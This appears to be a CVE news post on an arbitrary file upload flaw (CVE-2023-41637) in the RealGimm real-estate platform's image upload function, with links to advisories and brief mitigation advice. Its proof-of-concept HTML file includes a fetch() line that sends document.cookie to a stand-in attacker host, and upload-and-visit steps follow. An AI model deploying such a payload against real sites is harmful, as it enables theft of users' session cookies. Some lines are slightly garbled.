CVE CyberSecurity Database News

CVE-2023-41637 - Exploiting Arbitrary File Upload in GruppoSCAI RealGimm 1.1.37p38 via Carica immagine

Poster -

Security vulnerabilities that let attackers upload dangerous files are among the most serious and easy to exploit. In September 2023, a security issue known as CVE-2023-41637 was discovered in GruppoSCAI's RealGimm 1.1.37p38 software. The vulnerability affects the Carica immagine (Upload image) function, enabling attackers to upload malicious HTML files and ultimately run code on the server.

In this post, we'll break down how this vulnerability works, show example code and exploitation steps, and link to original sources. Content here is exclusive and simple, based on facts found throughout the security community.

What is GruppoSCAI RealGimm?

GruppoSCAI is an Italian IT company. Their product RealGimm is a management platform used in real estate. The Carica immagine feature allows realtors to upload property images to create and update listings.

What is CVE-2023-41637?

CVE-2023-41637 is a type of vulnerability called arbitrary file upload. The Carica immagine button doesn't properly check what kind of files are being uploaded. An attacker can upload a file that is not really an image, tricking the server into accepting and storing it. If the file contains code (like HTML/JavaScript or even PHP), and if it is placed in a web-accessible directory, the attacker can visit their file and run code or steal data.

Official CVE Entry:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-41637
Exploit Database:
https://www.exploit-db.com/exploits/51701

How Does the Vulnerability Work?

When you use the Carica immagine function, it just checks the file extension (like .jpg or .png) or only partially checks the file contents. An attacker can take a dangerous file, rename it to look like an image (for example, evil.html renamed to evil.jpg), and the system will accept it.

Proof-of-Concept Exploit

Below is a sample HTML file that contains JavaScript code. For a real attack, this file could steal cookies, redirect users, or run anything the attacker wants.

<!-- Save as evil.html (then upload as evil.jpg or evil.html if possible) -->
<html>
  <body>
    <script>
      // This just pops up a box, but could steal cookies or send data
      alert('XSS by CVE-2023-41637!');
      // Example: Send document cookies to an attacker server
      fetch('https://attacker.com/log?cookie='; + document.cookie);
    </script>
    <h1>It works!</h1>
  </body>
</html>

Visit the URL where uploaded files are stored, for example:

https://target.com/uploads/evil.html

or

https://target.com/uploads/evil.jpg (the server may not check contents).

If the server lets you upload and then directly access your file, the vulnerability is confirmed.

Redirecting users to phishing or malware

- If the application also allows server-side scripts (like PHP or ASP), this could lead to remote code execution, letting attackers take over the entire server.

Update to the latest version when a patch becomes available.

Reference:
https://nvd.nist.gov/vuln/detail/CVE-2023-41637
https://packetstormsecurity.com/files/174788/RealGimm-1.1.37p38-Arbitrary-File-Upload.html

Summary

CVE-2023-41637 is a critical vulnerability in RealGimm's image upload function that allows attackers to upload and execute arbitrary code through a malicious HTML file. If your organization uses RealGimm, restrict access to its upload function, monitor for suspicious files, and demand a security patch from the vendor.

References

- CVE Details Page
- Exploit-DB Example #51701
- PacketStorm Security Advisory

Timeline

Published on: 08/31/2023 14:15:08 UTC
Last modified on: 09/06/2023 23:15:26 UTC